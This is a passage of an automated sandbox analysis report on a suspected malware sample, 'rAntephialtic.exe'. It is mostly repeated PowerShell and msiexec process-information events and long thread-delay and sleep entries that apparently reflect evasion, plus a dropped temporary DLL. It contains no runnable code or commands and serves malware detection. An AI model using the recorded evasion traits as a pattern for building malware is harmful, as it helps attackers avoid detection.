          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599884Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599781Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599672Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599562Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599453Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599344Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599219Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599100Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599000Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598889Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598781Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598672Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598562Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598453Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598344Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598234Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598125Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598015Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597906Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597797Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597687Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597573Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597466Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597359Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597233Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597109Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596998Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596890Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596770Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596656Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596545Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596417Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596312Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596203Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596086Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595984Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595875Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595765Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595656Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595547Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595437Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595328Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595219Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595094Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594984Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594875Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594765Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594656Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594547Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6994Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2663Jump to behavior
          Source: C:\Users\user\Desktop\rAntephialtic.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsd4D6C.tmp\nsExec.dllJump to dropped file
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7820Thread sleep time: -10145709240540247s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580Thread sleep time: -22136092888451448s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580Thread sleep time: -600000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7300Thread sleep count: 3406 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580Thread sleep time: -599884s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7300Thread sleep count: 6447 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580Thread sleep time: -599781s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580Thread sleep time: -599672s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580Thread sleep time: -599562s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580Thread sleep time: -599453s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580Thread sleep time: -599344s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580Thread sleep time: -599219s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580Thread sleep time: -599100s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580Thread sleep time: -599000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580Thread sleep time: -598889s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580Thread sleep time: -598781s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580Thread sleep time: -598672s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580Thread sleep time: -598562s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580Thread sleep time: -598453s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580Thread sleep time: -598344s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580Thread sleep time: -598234s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580Thread sleep time: -598125s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580Thread sleep time: -598015s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580Thread sleep time: -597906s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580Thread sleep time: -597797s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580Thread sleep time: -597687s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580Thread sleep time: -597573s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580Thread sleep time: -597466s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580Thread sleep time: -597359s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580Thread sleep time: -597233s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580Thread sleep time: -597109s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580Thread sleep time: -596998s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580Thread sleep time: -596890s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580Thread sleep time: -596770s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580Thread sleep time: -596656s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580Thread sleep time: -596545s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580Thread sleep time: -596417s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580Thread sleep time: -596312s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580Thread sleep time: -596203s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580Thread sleep time: -596086s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580Thread sleep time: -595984s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580Thread sleep time: -595875s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580Thread sleep time: -595765s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580Thread sleep time: -595656s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580Thread sleep time: -595547s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580Thread sleep time: -595437s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580Thread sleep time: -595328s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580Thread sleep time: -595219s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580Thread sleep time: -595094s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580Thread sleep time: -594984s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580Thread sleep time: -594875s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580Thread sleep time: -594765s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580Thread sleep time: -594656s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6580Thread sleep time: -594547s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\rAntephialtic.exeCode function: 1_2_00406739 FindFirstFileW,FindClose,1_2_00406739
